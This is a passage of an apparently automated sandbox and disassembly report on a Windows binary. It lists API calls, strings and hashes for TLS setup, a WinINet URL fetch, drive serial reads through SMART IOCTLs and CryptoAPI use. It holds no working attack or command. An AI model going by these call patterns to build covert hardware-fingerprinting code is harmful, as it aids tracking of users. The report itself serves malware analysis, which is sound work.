    • schannel: CA file '%s' is not correctly formatted, xrefs: 006B074F
    • schannel: failed to add certificate from CA file '%s' to certificate store: %s, xrefs: 006B08ED
    • schannel: added %d certificate(s) from CA file '%s', xrefs: 006B0944
    • schannel: failed to determine size of CA file '%s': %s, xrefs: 006B054E
    • schannel: did not add any certificates from CA file '%s', xrefs: 006B0929
    • -----BEGIN CERTIFICATE-----, xrefs: 006B06D9
    • M, xrefs: 006B08FE
    • -----END CERTIFICATE-----, xrefs: 006B06A5
    • schannel: failed to read from CA file '%s': %s, xrefs: 006B0652
    • schannel: unexpected content type '%d' when extracting certificate from CA file '%s', xrefs: 006B0860
    • schannel: CA file exceeds max size of %u bytes, xrefs: 006B0581
    • -----BEGIN CERTIFICATE-----, xrefs: 006B06F9
    • schannel: invalid path name for CA file '%s': %s, xrefs: 006B0479
    • schannel: failed to open CA file '%s': %s, xrefs: 006B04ED
    • schannel: failed to extract certificate from CA file '%s': %s, xrefs: 006B081C
    • -----END CERTIFICATE-----, xrefs: 006B0728
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ErrorLast$CheckStackVars@8_strrchr$CloseCreateFileHandle_strlen_strncpy
    • String ID: -----END CERTIFICATE-----$-----END CERTIFICATE-----$-----BEGIN CERTIFICATE-----$-----BEGIN CERTIFICATE-----$M$schannel: CA file '%s' is not correctly formatted$schannel: CA file exceeds max size of %u bytes$schannel: added %d certificate(s) from CA file '%s'$schannel: did not add any certificates from CA file '%s'$schannel: failed to add certificate from CA file '%s' to certificate store: %s$schannel: failed to determine size of CA file '%s': %s$schannel: failed to extract certificate from CA file '%s': %s$schannel: failed to open CA file '%s': %s$schannel: failed to read from CA file '%s': %s$schannel: invalid path name for CA file '%s': %s$schannel: unexpected content type '%d' when extracting certificate from CA file '%s'
    • API String ID: 4084252120-2431966791
    • Opcode ID: baf85009b9d8feabcff6815e782fef225362cda263d2d21935e0dffe955c7e0e
    • Instruction ID: 7062d41f2d0bdb55827058b24046b45f16f4149f12d20e45cb8837f940bc8548
    • Opcode Fuzzy Hash: baf85009b9d8feabcff6815e782fef225362cda263d2d21935e0dffe955c7e0e
    • Instruction Fuzzy Hash: CDF181F1D00218EFEB54EB94DC86BEEBBBAAB05304F104198F51977282DB745A84CF95
    APIs
    • GetModuleHandleA.KERNEL32(ntdll,wine_get_version,?,?,?), ref: 00680378
    • GetProcAddress.KERNEL32(00000000), ref: 00680386
    • @_RTC_CheckStackVars@8.LIBCMT ref: 006810B3
    Strings
    • schannel: ALPN, offering %s, xrefs: 00680D27
    • ntdll, xrefs: 00680373
    • schannel: initial InitializeSecurityContext failed: %s, xrefs: 00680F6C
    • schannel: Windows version is old and may not be able to connect to some servers due to lack of SNI, algorithms, etc., xrefs: 0068034B
    • schannel: Failed to open cert store %x %s, last error is %x, xrefs: 0068090D
    • schannel: using IP address, SNI is not supported by OS., xrefs: 00680C1E
    • wine_get_version, xrefs: 0068036C
    • schannel: this version of Windows is too old to support certificate verification via CA bundle file., xrefs: 0068048B
    • schannel: AcquireCredentialsHandle failed: %s, xrefs: 00680B7C
    • schannel: failed to send initial handshake data: sent %zd of %lu bytes, xrefs: 00681056
    • http/1.1, xrefs: 00680D22
    • Microsoft Unified Security Protocol Provider, xrefs: 00680B04
    • schannel: SNI or certificate check failed: %s, xrefs: 00680FA3
    • schannel: Failed to get certificate location for %s, xrefs: 0068088E
    • Unable to set ciphers to passed via SSL_CONN_CONFIG, xrefs: 00680806
    • http/1.1, xrefs: 00680CF8
    • , xrefs: 006805F1
    • schannel: unable to allocate memory, xrefs: 00680E1A
    • Unrecognized parameter passed via CURLOPT_SSLVERSION, xrefs: 006806DF
    • schannel: unable to allocate memory, xrefs: 00680A83
    • schannel: initial InitializeSecurityContext failed: %s, xrefs: 00680FDA
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: AddressCheckHandleModuleProcStackVars@8
    • String ID: $Microsoft Unified Security Protocol Provider$Unable to set ciphers to passed via SSL_CONN_CONFIG$Unrecognized parameter passed via CURLOPT_SSLVERSION$http/1.1$http/1.1$ntdll$schannel: ALPN, offering %s$schannel: AcquireCredentialsHandle failed: %s$schannel: Failed to get certificate location for %s$schannel: Failed to open cert store %x %s, last error is %x$schannel: SNI or certificate check failed: %s$schannel: Windows version is old and may not be able to connect to some servers due to lack of SNI, algorithms, etc.$schannel: failed to send initial handshake data: sent %zd of %lu bytes$schannel: initial InitializeSecurityContext failed: %s$schannel: initial InitializeSecurityContext failed: %s$schannel: this version of Windows is too old to support certificate verification via CA bundle file.$schannel: unable to allocate memory$schannel: unable to allocate memory$schannel: using IP address, SNI is not supported by OS.$wine_get_version
    • API String ID: 3711174304-2518537087
    • Opcode ID: 7a37161099800ad6dd0d449ad885c73e881d65334ecb1b47fb29373916ad5286
    • Instruction ID: 4918ed5116e33d097181897bf97908cf49bcaac8d4a7e365b7c50f98e3f0d1ce
    • Opcode Fuzzy Hash: 7a37161099800ad6dd0d449ad885c73e881d65334ecb1b47fb29373916ad5286
    • Instruction Fuzzy Hash: 0692C2B0A00219DFEB64DF54C895BEEB7B6BB48304F1486A8E5096B381D7719EC5CF90
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _strlen$CheckStackVars@8
    • String ID: Bind to local port %hu failed, trying next$Couldn't bind to '%s'$Couldn't bind to interface '%s'$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$getsockname() failed with errno %d: %s$ho$lo
    • API String ID: 3286693010-4200049518
    • Opcode ID: 02cbc57ff968f631e588eda6b8dbe54e94bc1afbf78763d2fba0e2e9c76739bd
    • Instruction ID: 6b66969e1d4d329559c6707be7a4e9baf3da88a73c790fce737d52ff2818578d
    • Opcode Fuzzy Hash: 02cbc57ff968f631e588eda6b8dbe54e94bc1afbf78763d2fba0e2e9c76739bd
    • Instruction Fuzzy Hash: 3E2280B5900228DBDB64DB54CC86BE9B776AF49304F0481DDE80EA7351DB719E84CF92
    APIs
    • socket.WS2_32(00000002,00000001,00000006), ref: 0067D2D7
    • htonl.WS2_32(7F000001), ref: 0067D315
    • setsockopt.WS2_32(000000FF,0000FFFF,00000004,00000001,00000004), ref: 0067D362
    • closesocket.WS2_32(000000FF), ref: 0067D571
    • closesocket.WS2_32(00000004), ref: 0067D58F
    • closesocket.WS2_32 ref: 0067D5AD
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0067D5C7
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: closesocket$CheckStackVars@8htonlsetsockoptsocket
    • String ID:
    • API String ID: 1730456080-0
    • Opcode ID: 2ab0964aaf56cf04946db71fae1c6910938b232cb5225f8e49cb42304d21a9b7
    • Instruction ID: a3fdeb049854b6204c70cafcbf97ffe7f98255572e36d1c33561756c5e0d85dc
    • Opcode Fuzzy Hash: 2ab0964aaf56cf04946db71fae1c6910938b232cb5225f8e49cb42304d21a9b7
    • Instruction Fuzzy Hash: B7A1F9719002149BEB14EBA8D882BED7777EF45720F504728FA29EB2D1DA349D41C7E1
    APIs
    • InternetOpenW.WININET(UrlTest1,00000000,00000000,00000000,00000000), ref: 00635B5E
    • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,04000000,00000000), ref: 00635B82
    • InternetReadFile.WININET(00000000,?,000003FF,00000000), ref: 00635C3E
    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 00635C71
    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 00635CBF
    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 00635CD4
    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00635D0C
    • InternetCloseHandle.WININET(00000000), ref: 00635ED2
    • InternetCloseHandle.WININET(?), ref: 00635FA1
    • GetLastError.KERNEL32 ref: 00635FD6
    • InternetGetLastResponseInfoA.WININET(?,?,?), ref: 00635FF7
      • Part of subcall function 00636110: std::locale::_Init.LIBCPMT ref: 00636158
      • Part of subcall function 00636110: std::_Lockit::_Lockit.LIBCPMT ref: 0063616F
      • Part of subcall function 00636110: std::_Lockit::_Lockit.LIBCPMT ref: 00636191
      • Part of subcall function 00636110: std::_Lockit::~_Lockit.LIBCPMT ref: 006361B1
      • Part of subcall function 00636110: std::_Facet_Register.LIBCPMT ref: 00636216
      • Part of subcall function 00636110: std::_Lockit::~_Lockit.LIBCPMT ref: 00636232
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: Internet$std::_$ByteCharLockitMultiWide$CloseHandleLastLockit::_Lockit::~_Open$ErrorFacet_FileInfoInitReadRegisterResponsestd::locale::_
    • String ID: UrlTest1$network_err
    • API String ID: 1830447136-3424925398
    • Opcode ID: 65a15bc1eacfdb10b996e69dfaa58e28ebdf9bf26b799ed11a578678b2ec7aa3
    • Instruction ID: 4c0b4bc91f46b65733c6d06a26dfe12fe50ab35fbcda6b44137540099924f170
    • Opcode Fuzzy Hash: 65a15bc1eacfdb10b996e69dfaa58e28ebdf9bf26b799ed11a578678b2ec7aa3
    • Instruction Fuzzy Hash: 3602C5B1A006149FDB24DB28CD45BEEB7B6EF45300F14429DE609AB2D1DB716E84CF98
    APIs
    • CreateFileA.KERNEL32(?,C0000000,00000007,00000000,00000003,00000000,00000000), ref: 00632D49
    • GetLastError.KERNEL32 ref: 00632D6B
    • DeviceIoControl.KERNEL32(00000000,00074080,00000000,00000000,?,00000018,?,00000000), ref: 00632DD2
    • GetLastError.KERNEL32 ref: 00632DDC
    • DeviceIoControl.KERNEL32(?,0007C088,00000000,00000021,00000000,00000221,?,00000000), ref: 00632E60
    • CloseHandle.KERNEL32(?,-00000010,?), ref: 00632F41
    Strings
    • %d ReadPhysicalDriveInNTUsingSmart ERROR, CreateFileA(%s) returned INVALID_HANDLE_VALUE Error Code %d, xrefs: 00632D7F
    • %d ReadPhysicalDriveInNTUsingSmart ERROR DeviceIoControl(%d, SMART_GET_VERSION) returned 0, error is %d, xrefs: 00632E05
    • SMART_RCV_DRIVE_DATA IOCTL, xrefs: 00632E7C
    • \\.\PhysicalDrive%d, xrefs: 00632D11
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ControlDeviceErrorLast$CloseCreateFileHandle
    • String ID: %d ReadPhysicalDriveInNTUsingSmart ERROR DeviceIoControl(%d, SMART_GET_VERSION) returned 0, error is %d$%d ReadPhysicalDriveInNTUsingSmart ERROR, CreateFileA(%s) returned INVALID_HANDLE_VALUE Error Code %d$SMART_RCV_DRIVE_DATA IOCTL$\\.\PhysicalDrive%d
    • API String ID: 1527324045-921166951
    • Opcode ID: 426a3595bdfbb4f5338830f25aaec8a6b228a39937158f2fe632e9d52cacc1a8
    • Instruction ID: bd6b22c8c0f666949bf8f547bd15b9df2dc6e7d6e273655159d10882e25de523
    • Opcode Fuzzy Hash: 426a3595bdfbb4f5338830f25aaec8a6b228a39937158f2fe632e9d52cacc1a8
    • Instruction Fuzzy Hash: 52611531A443415BD320DB28DC06FFF77AAEFD5310F01461DF649AB182EB70A5848796
    APIs
    • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 00632A93
    • DeviceIoControl.KERNEL32(00000000,00074080,00000000,00000000,?,00000018,?), ref: 00632B16
    • GetLastError.KERNEL32 ref: 00632B20
    • DeviceIoControl.KERNEL32(00000000,0007C088,?,00000020,?,00000210,?,00000000), ref: 00632C03
    • CloseHandle.KERNEL32(00000000), ref: 00632CC8
    Strings
    • %d ReadPhysicalDriveInNTWithAdminRights ERROR DeviceIoControl() %d, DFP_GET_VERSION) returned 0, error is %d, xrefs: 00632B3D
    • %d ReadPhysicalDriveInNTWithAdminRights ERROR ,CreateFileA(%s) returned INVALID_HANDLE_VALUE, xrefs: 00632ABC
    • \\.\PhysicalDrive%d, xrefs: 00632A58
    • %d ReadPhysicalDriveInNTWithAdminRights ERROR No device found at iPosition %d (%d), xrefs: 00632B75
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ControlDevice$CloseCreateErrorFileHandleLast
    • String ID: %d ReadPhysicalDriveInNTWithAdminRights ERROR ,CreateFileA(%s) returned INVALID_HANDLE_VALUE$%d ReadPhysicalDriveInNTWithAdminRights ERROR DeviceIoControl() %d, DFP_GET_VERSION) returned 0, error is %d$%d ReadPhysicalDriveInNTWithAdminRights ERROR No device found at iPosition %d (%d)$\\.\PhysicalDrive%d
    • API String ID: 3154202731-1836870114
    • Opcode ID: 94e9cfd217d3929cf6766ef209744100fbeaccf31ca31d8b8acdeb58fc36f011
    • Instruction ID: 7d00d9792087c972201b0504d64774587ea8fddd7f3aa56b807c7667855f5566
    • Opcode Fuzzy Hash: 94e9cfd217d3929cf6766ef209744100fbeaccf31ca31d8b8acdeb58fc36f011
    • Instruction Fuzzy Hash: C0714B31A483415EE311DF34DC06BFBB7D9EF95704F10461DF584AB282EB7095898796
    APIs
    • CreateFileA.KERNEL32(?,00000000,00000003,00000000,00000003,00000000,00000000), ref: 0063312B
    • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00002710,?,00000000), ref: 006331D7
    • DeviceIoControl.KERNEL32(00000000,000700A0,00000000,00000000,?,00002710,?,00000000), ref: 006332FF
    • GetLastError.KERNEL32(?,?,00002710), ref: 00633327
    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00002710), ref: 0063334F
    Strings
    • DeviceIOControl IOCTL_STORAGE_QUERY_PROPERTY error = %d, xrefs: 00633340
    • %d ReadPhysicalDriveInNTWithZeroRights ERROR CreateFileA(%s) returned INVALID_HANDLE_VALUE, xrefs: 00633155
    • \\.\PhysicalDrive%d, xrefs: 006330FD
    • %s ReadPhysicalDriveInNTWithZeroRights ERROR DeviceIoControl(), IOCTL_DISK_GET_DRIVE_GEOMETRY_EX) returned 0, xrefs: 00633320
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ControlDevice$CloseCreateErrorFileHandleLast
    • String ID: %d ReadPhysicalDriveInNTWithZeroRights ERROR CreateFileA(%s) returned INVALID_HANDLE_VALUE$%s ReadPhysicalDriveInNTWithZeroRights ERROR DeviceIoControl(), IOCTL_DISK_GET_DRIVE_GEOMETRY_EX) returned 0$DeviceIOControl IOCTL_STORAGE_QUERY_PROPERTY error = %d$\\.\PhysicalDrive%d
    • API String ID: 3154202731-3012117823
    • Opcode ID: 8a808d415cbc76d3744590f218baf245edb9584b36d54b5e13aff1c2211744a9
    • Instruction ID: 0e939fe4071ba8c2f09494be40ca77b2966a5799801e16e602c9d61c03fef693
    • Opcode Fuzzy Hash: 8a808d415cbc76d3744590f218baf245edb9584b36d54b5e13aff1c2211744a9
    • Instruction Fuzzy Hash: 1B6181B16483846EE321DB64DC46FFB77DDAB44700F00092DF689D62C1DBB4E64487A6
    APIs
    • GetLastError.KERNEL32(?,00664304,?,?,00000080), ref: 006A593A
    • _strncpy.LIBCMT ref: 006A598E
    • FormatMessageA.KERNEL32(00001200,00000000,00000000,00000000,?,00664304,00000000,?,?,?,00664304,?), ref: 006A59C9
      • Part of subcall function 006BFA14: _RTC_Failure.LIBCMT ref: 006BFA2D
    • _strrchr.LIBCMT ref: 006A5A06
    • _strrchr.LIBCMT ref: 006A5A2E
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,00664304), ref: 006A5A68
    • SetLastError.KERNEL32(00000080,?,?,?,?,?,?,?,00664304), ref: 006A5A80
      • Part of subcall function 006A63D0: GetLastError.KERNEL32(?,00000000,?,00664304,?,00664304,?), ref: 006A63EA
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ErrorLast$_strrchr$FailureFormatMessage_strncpy
    • String ID: Unknown error %d (%#x)
    • API String ID: 2414996614-2414550090
    • Opcode ID: bc5428be27a39030d8f4b84bb422b2b9ebfe8ba8f438219982bb24b6807333c6
    • Instruction ID: 7b7c13762522e0ec10e6cbdd5dfb6bf073a4b9f306baef9fc22e7b1f1ea3bffa
    • Opcode Fuzzy Hash: bc5428be27a39030d8f4b84bb422b2b9ebfe8ba8f438219982bb24b6807333c6
    • Instruction Fuzzy Hash: 9E514D71A00648EFCB54EFA8C886BAE77B6AF46310F10C159F9199B351D734AE40CFA5
    APIs
    • CryptAcquireContextA.ADVAPI32(006E9778,00000000,00000000,00000001,F0000000,?,00000000), ref: 006B37C9
    • CryptImportKey.ADVAPI32(006E9778,00000008,00000014,00000000,00000000,?), ref: 006B3839
    • CryptReleaseContext.ADVAPI32(006E9778,00000000), ref: 006B3852
    • @_RTC_CheckStackVars@8.LIBCMT ref: 006B38CE
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: Crypt$Context$AcquireCheckImportReleaseStackVars@8
    • String ID: 4oh
    • API String ID: 775994875-2100234844
    • Opcode ID: f9ff749ec4892093e53e176280f93f942574c0c715c996b382079b6708725e9f
    • Instruction ID: 002b68cb291b55c75bb2d05cc5af72981b1cf76867a2b75c62c5f30661f937fa
    • Opcode Fuzzy Hash: f9ff749ec4892093e53e176280f93f942574c0c715c996b382079b6708725e9f
    • Instruction Fuzzy Hash: 3E41B6B2E00314BBDB50EBA8DC83FDE777AAB45700F404118FA09BB291DA759A4487E5
    APIs
    • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,?,F0000000), ref: 0068308E
    • CryptCreateHash.ADVAPI32(00000000,?,00000000,00000000,00000000), ref: 006830B6
    • CryptDestroyHash.ADVAPI32(00000000), ref: 00683154
    • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0068316F
    • @_RTC_CheckStackVars@8.LIBCMT ref: 00683186
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: Crypt$ContextHash$AcquireCheckCreateDestroyReleaseStackVars@8
    • String ID:
    • API String ID: 4072197435-0
    • Opcode ID: 5cc934f4a3b110a091a0e6cabc29c79f590c8a48a5ff61152d4db6f3760ca392
    • Instruction ID: 7985b8cae4b3088477d66136a952d14199fd1e336825e97e85e271ece0fb27b7
    • Opcode Fuzzy Hash: 5cc934f4a3b110a091a0e6cabc29c79f590c8a48a5ff61152d4db6f3760ca392
    • Instruction Fuzzy Hash: 1641D872A00224AFDB60EB98DC86BEE777BAB45F00F114218F905BB390D7759E4487E1
    APIs
      • Part of subcall function 006D8D61: GetLastError.KERNEL32(006FA414,?,?,006D2BC1,?,?,006BD916,?,?,?,?,?,?,?,006FA414,?), ref: 006D8D66
      • Part of subcall function 006D8D61: SetLastError.KERNEL32(00000000,00000006,000000FF,?,006BD916,?,?,?,?,?,?,?,006FA414,?), ref: 006D8E04
    • GetACP.KERNEL32(?,?,?,?,?,?,006D5038,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 006E2537
    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,006D5038,?,?,?,00000055,?,-00000050,?,?), ref: 006E2562
    • _wcschr.LIBVCRUNTIME ref: 006E25F6
    • _wcschr.LIBVCRUNTIME ref: 006E2604
    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 006E26C5
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
    • String ID: utf8
    • API String ID: 4147378913-905460609
    • Opcode ID: b062267815ec69c55da4c9c93a16152f7599991b48004250d71b415122384fdb
    • Instruction ID: c2ae37568b7c9bceaae54de9c67259c0520cc99452bee8606158c1a50e0d45ca
    • Opcode Fuzzy Hash: b062267815ec69c55da4c9c93a16152f7599991b48004250d71b415122384fdb
    • Instruction Fuzzy Hash: 9071F471642387ABDB24AB36CC66EF673AFEF45700F14442AF5059B2C2EA70E9418764
    APIs
    • GetLocaleInfoW.KERNEL32(00000000,2000000B,006E2F20,00000002,00000000,?,?,?,006E2F20,?,00000000), ref: 006E2C9B
    • GetLocaleInfoW.KERNEL32(00000000,20001004,006E2F20,00000002,00000000,?,?,?,006E2F20,?,00000000), ref: 006E2CC4
    • GetACP.KERNEL32(?,?,006E2F20,?,00000000), ref: 006E2CD9
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: InfoLocale
    • String ID: ACP$OCP
    • API String ID: 2299586839-711371036
    • Opcode ID: f64a8d0f3d557a5651d2bcf108a8dec5b32db1b6f04124d0a6fce9cf6eca1707
    • Instruction ID: aa83352e841bfaa438108a6c06c40f482eea0515f93d2e59d8762ba87fe9d8d1
    • Opcode Fuzzy Hash: f64a8d0f3d557a5651d2bcf108a8dec5b32db1b6f04124d0a6fce9cf6eca1707
